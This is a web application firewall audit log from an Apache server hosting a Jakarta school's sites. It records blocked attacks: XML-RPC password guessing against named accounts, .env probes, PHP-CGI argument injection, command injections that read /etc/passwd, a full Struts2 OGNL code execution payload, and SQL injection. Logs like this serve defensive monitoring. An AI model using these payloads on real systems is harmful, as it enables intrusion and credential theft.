Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --422ed533-Z-- --084b8f0c-A-- [22/May/2025:20:35:47 +0700] aC8oM-ThJmFSRJ5-OZfc0wAAAEc 103.236.140.4 57952 103.236.140.4 8181 --084b8f0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1513 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --084b8f0c-C-- system.multicall methodName wp.getUsersBlogs params timkreatif timkreatiftimkreatif --084b8f0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --084b8f0c-E-- --084b8f0c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (6+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747920947249573 7083 (- - -) Stopwatch2: 1747920947249573 7083; combined=5640, p1=458, p2=5012, p3=0, p4=0, p5=100, sr=87, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --084b8f0c-Z-- --aa56ce4e-A-- [22/May/2025:20:37:13 +0700] aC8oieThJmFSRJ5-OZfc8wAAAEU 103.236.140.4 58076 103.236.140.4 8181 --aa56ce4e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1508 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --aa56ce4e-C-- system.multicall methodName wp.getUsersBlogs params timkreatif timkreatif@2025 --aa56ce4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa56ce4e-E-- --aa56ce4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (3+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747921033867378 7983 (- - -) Stopwatch2: 1747921033867378 7983; combined=5875, p1=531, p2=5160, p3=0, p4=0, p5=111, sr=91, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa56ce4e-Z-- --f7638e2d-A-- [22/May/2025:20:38:13 +0700] aC8oxeThJmFSRJ5-OZfdDQAAAEo 103.236.140.4 58170 103.236.140.4 8181 --f7638e2d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1501 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --f7638e2d-C-- system.multicall methodName wp.getUsersBlogs params timkreatif password --f7638e2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7638e2d-E-- --f7638e2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (7+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747921093907938 6292 (- - -) Stopwatch2: 1747921093907938 6292; combined=5064, p1=436, p2=4464, p3=0, p4=0, p5=96, sr=79, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7638e2d-Z-- --fa245670-A-- [22/May/2025:20:39:25 +0700] aC8pDeThJmFSRJ5-OZfdLQAAAEg 103.236.140.4 58290 103.236.140.4 8181 --fa245670-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1496 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --fa245670-C-- system.multicall methodName wp.getUsersBlogs params timkreatif 007 --fa245670-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa245670-E-- --fa245670-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (6+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747921165260268 7363 (- - -) Stopwatch2: 1747921165260268 7363; combined=5664, p1=468, p2=5019, p3=0, p4=0, p5=106, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa245670-Z-- --94c8ef64-A-- [22/May/2025:20:40:46 +0700] aC8pXuThJmFSRJ5-OZfdVAAAAEA 103.236.140.4 58406 103.236.140.4 8181 --94c8ef64-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1503 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --94c8ef64-C-- system.multicall methodName wp.getUsersBlogs params timkreatif timkreatif --94c8ef64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94c8ef64-E-- --94c8ef64-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (8+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747921246093013 6853 (- - -) Stopwatch2: 1747921246093013 6853; combined=5192, p1=508, p2=4577, p3=0, p4=0, p5=63, sr=98, sw=44, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94c8ef64-Z-- --000b020b-A-- [22/May/2025:20:41:56 +0700] aC8ppOThJmFSRJ5-OZfdegAAAFI 103.236.140.4 58538 103.236.140.4 8181 --000b020b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1503 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --000b020b-C-- system.multicall methodName wp.getUsersBlogs params kesiswaan kesiswaan@1 --000b020b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --000b020b-E-- --000b020b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (14+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747921316400753 7051 (- - -) Stopwatch2: 1747921316400753 7051; combined=5392, p1=492, p2=4717, p3=0, p4=0, p5=111, sr=97, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --000b020b-Z-- --6428d755-A-- [22/May/2025:20:42:57 +0700] aC8p4WfriXjg62qQwE9mlAAAAI8 103.236.140.4 58644 103.236.140.4 8181 --6428d755-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1501 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/xml --6428d755-C-- system.multicall methodName wp.getUsersBlogs params kesiswaan Kesiswaan --6428d755-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6428d755-E-- --6428d755-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (15+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747921377636284 6938 (- - -) Stopwatch2: 1747921377636284 6938; combined=5123, p1=538, p2=4470, p3=0, p4=0, p5=69, sr=92, sw=46, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6428d755-Z-- --40212237-A-- [22/May/2025:20:49:43 +0700] aC8rd-ThJmFSRJ5-OZfd4QAAAFc 103.236.140.4 59330 103.236.140.4 8181 --40212237-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 Accept-Charset: utf-8 --40212237-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40212237-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747921783389127 874 (- - -) Stopwatch2: 1747921783389127 874; combined=366, p1=325, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40212237-Z-- --4aea2a65-A-- [22/May/2025:21:17:41 +0700] aC8yBX0O04WKE1HJ5iR2PwAAAAs 103.236.140.4 59946 103.236.140.4 8181 --4aea2a65-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.59.12.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.59.12.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4aea2a65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4aea2a65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747923461895761 4556 (- - -) Stopwatch2: 1747923461895761 4556; combined=2330, p1=693, p2=1598, p3=0, p4=0, p5=38, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4aea2a65-Z-- --e9e56950-A-- [22/May/2025:21:22:30 +0700] aC8zJn0O04WKE1HJ5iR2RAAAABU 103.236.140.4 59992 103.236.140.4 8181 --e9e56950-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5 Accept-Charset: utf-8 --e9e56950-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9e56950-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747923750915397 857 (- - -) Stopwatch2: 1747923750915397 857; combined=362, p1=323, p2=0, p3=0, p4=0, p5=39, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9e56950-Z-- --02bf473f-A-- [22/May/2025:21:43:03 +0700] aC8392friXjg62qQwE9nvwAAAIU 103.236.140.4 60510 103.236.140.4 8181 --02bf473f-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 88.151.34.37 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 88.151.34.37 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --02bf473f-C-- --02bf473f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02bf473f-E-- --02bf473f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747924983753257 4844 (- - -) Stopwatch2: 1747924983753257 4844; combined=3097, p1=430, p2=2635, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02bf473f-Z-- --8660bd76-A-- [22/May/2025:21:49:25 +0700] aC85dSektx75wRFPQyj-_QAAANQ 103.236.140.4 60712 103.236.140.4 8181 --8660bd76-B-- POST /bsh.servlet.BshServlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 58 User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 168602622 --8660bd76-C-- bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw --8660bd76-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8660bd76-E-- --8660bd76-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /bsh.servlet.BshServlet"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747925365966804 1883 (- - -) Stopwatch2: 1747925365966804 1883; combined=598, p1=415, p2=150, p3=0, p4=0, p5=32, sr=69, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8660bd76-Z-- --d1f34f3d-A-- [22/May/2025:21:49:25 +0700] aC85dX0O04WKE1HJ5iR2WQAAAAI 103.236.140.4 60726 103.236.140.4 8181 --d1f34f3d-B-- POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 25 User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/110.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 160563299 --d1f34f3d-C-- type='|cat /etc/passwd||' --d1f34f3d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1f34f3d-E-- --d1f34f3d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /webadm/?q=moni_detail.do&action=gragh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747925365968446 2524 (- - -) Stopwatch2: 1747925365968446 2524; combined=790, p1=526, p2=223, p3=0, p4=0, p5=41, sr=98, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1f34f3d-Z-- --76794d65-A-- [22/May/2025:21:49:25 +0700] aC85dSektx75wRFPQyj-_gAAAME 103.236.140.4 60716 103.236.140.4 8181 --76794d65-B-- POST /portal/login_init.action HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Java/1.8.0_333 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Cache-Control: no-cache Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo 8yx7htwjwg').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Pragma: no-cache X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 70845991 --76794d65-C-- --76794d65-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76794d65-H-- Message: Access denied with code 403 (phase 2). Match of "rx ^(?:\\w+\\/[\\w\\-\\.]+)(?:;(?:charset=[\\w\\-]{1,18}|boundary=[\\w\\-]+)?)?$" against "REQUEST_HEADERS:Content-Type" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "6743"] [id "243930"] [rev "2"] [msg "COMODO WAF: Remote code execution in Apache Struts versions 2.3.31 - 2.3.5 and 2.5 - 2.5.10 (CVE-2017-5638)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747925365967355 4313 (- - -) Stopwatch2: 1747925365967355 4313; combined=2965, p1=453, p2=2473, p3=0, p4=0, p5=38, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76794d65-Z-- --f8db1163-A-- [22/May/2025:21:49:25 +0700] aC85deThJmFSRJ5-OZfeEAAAAEY 103.236.140.4 60724 103.236.140.4 8181 --f8db1163-B-- POST /zentao/user-login.html HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/zentao/user-login.html Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 72 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/114.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 165938562 --f8db1163-C-- account=admin'+and++updatexml(1,concat(0x1,md5(999999999)),1)+and+'1'='1 --f8db1163-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8db1163-E-- --f8db1163-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "[\\[\\]\\x22',()\\.]{10}$|\\b(?:union\\sall\\sselect\\s(?:(?:null|\\d+),?)+|order\\sby\\s\\d{1,4}|(?:and|or)\\s\\d{4}=\\d{4}|waitfor\\sdelay\\s'\\d+:\\d+:\\d+'|(?:select|and|or)\\s(?:(?:pg_)?sleep\\(\\d+\\)|\\d+\\s?=\\s?(?:dbms_pipe\\.receive_message\\ ..." at ARGS_POST:account. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "66"] [id "218500"] [rev "18"] [msg "COMODO WAF: SQLmap attack detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: and '1'='1 found within ARGS_POST:account: admin' and updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747925365968440 3464 (- - -) Stopwatch2: 1747925365968440 3464; combined=1935, p1=480, p2=1432, p3=0, p4=0, p5=23, sr=85, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
